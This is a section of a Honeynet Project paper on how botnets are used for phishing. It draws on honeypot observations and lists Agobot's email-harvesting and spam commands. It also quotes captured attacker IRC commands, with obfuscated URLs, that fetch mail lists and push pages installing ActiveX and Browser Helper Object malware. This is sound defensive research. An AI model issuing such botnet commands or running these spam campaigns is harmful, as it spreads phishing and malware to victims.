Phishing Technique Three - Phishing Using Botnets

The recent white paper by the Honeynet Project called "KYE: Tracking Botnets" introduced a method to track botnets. A botnet is a network of compromised computers that can be remotely controlled by an attacker. Due to their immense size (tens of thousands of systems can be linked together), botnets can pose a severe threat to the community when used for Denial-of-Service (DoS) attacks. Initial research in this area demonstrated that botnets are sometimes used to send out spam emails and can also be used for phishing attacks. During a study in October 2004, email security company CipherTrust suggested that 70% of monitored phishing spam was sent through one of five active botnets, but our own observations suggest that many more botnets are in use for spam operations. Although not the analysis of one single incident, in this section we present our observations on the tools and techniques used by attackers engaged in phishing via botnets.

Incident Timeline

During the period between September 2004 and January 2005, the German Honeynet Project deployed a series of un-patched Microsoft Windows based honeypots to observe botnet activity. An automated process was developed to allow honeypots to be repeatedly deployed, compromised and shutdown for forensic analysis. During this period over 100 separate botnets were observed and thousands of files were captured for offline analysis.

Analysis

Some versions of bot software captured during this research project provided the capability to remotely start a SOCKS v4/v5 proxy on a compromised host. SOCKS provides a generic proxy mechanism for TCP/IP-based networking applications (RFC 1928) and can be used to proxy most popular Internet traffic, such as HTTP or SMTP email. If an attacker with access to a botnet enables the SOCKS proxy functionality on a remote bot, this machine can then be used to send bulk spam email. If the botnet contains many thousands of compromised hosts, an attacker is then able to send massive amounts of bulk email very easily, often from a wide range of IP addresses owned by unsuspecting home PC users.

The lack of a central point of contact and the range of international boundaries crossed could make it very difficult to trace and stop such activity, making it of low risk, but potentially high reward to spammers and phishers. Perhaps unsurprisingly, resourceful botnet owners have begun to target criminal activity and it is now possible to rent a botnet. For a fee, the botnet operator will provide a customer with a list of SOCKS v4 capable server IP addresses and ports. There are documented cases where botnets were sold to spammers as spam-relays: "Uncovered: Trojans as Spam Robots". Some captured bot software also implemented a special function to harvest email-addresses or to send spam via bots. The following listing shows some of the commands related to sending spam/phishing emails implemented in Agobot, a popular bot used by attackers and a variant regularly captured during our research:

  • harvest.emails - "makes the bot get a list of emails"
  • harvest.emailshttp - "makes the bot get a list of emails via HTTP"
  • spam.setlist - "downloads an email list"
  • spam.settemplate - "downloads an email template"
  • spam.start - "starts spamming"
  • spam.stop - "stops spamming"
  • aolspam.setlist - "AOL - downloads an email list"
  • aolspam.settemplate - "AOL - downloads an email template"
  • aolspam.setuser - "AOL - sets a username"
  • aolspam.setpass - "AOL - sets a password"
  • aolspam.start - "AOL - starts spamming"
  • aolspam.stop - "AOL - stops spamming"

Further information about how these commands are implemented can be found here in a side note about the source code of bots. With the help of drone, a customised IRC client developed by the German Honeynet Project, we were able to learn more about how bots are used for spam/phishing email attacks by smuggling a fake client into a botnet using the connection data collected through the attacks against our honeynets. A number of typical examples of observed activity are shown below.

Example 1

Within one particular botnet we observed an attacker who issued the following command (please note that the URLs have been obfuscated):

<St0n3y> .mm http://www.example.com/email/fetch.php?4a005aec5d7dbe3b01c75aab2b1c9991 http://www.foobar.net/pay.html Joe did_u_send_me_this

The command .mm ("mass emailing") is a customized version of the generic spam.start command. This command accepts four parameters:

  1. A URL for a file that contains several email addresses.
  2. The web page to target within the spam email - this could be a normal spam web-page or a phishing web site.
  3. The name of the sender.
  4. The subject of the email.

In this case, the fetch.php script returned 30 different email addresses every time it was invoked. To each of these recipients, an email message was constructed that advertised the second parameter of the command. In this example, it pointed to a web-page which attempted to install an ActiveX component on the victim's computer.

Example 2

In another botnet we observed the installation of Browser Helper Objects on a victim's PC:

[TOPIC] #spam9 :.open http://amateur.example.com/l33tag3/beta.html -s

The .open commands tells each bot to open the requested web-page and display it to the victim. In this case the web-page contained a Browser Helper Object (BHO) that would attempt to install itself on the victim's computer. As the channel name indicates, this botnet was also used for sending spam.

Example 3

In another botnet we observed examples of spyware propagation:

http://public.example.com/prompt.php?h=6d799fbeef3a9b386587f5f7b37f[...]

This link was found during analysis of captured malware. It directs the victim to the web-page of a company that offers "free ad delivery software which provides targeted advertising offers". This web site contains several pages that try to install ActiveX components on visiting clients, presumably adware or spyware.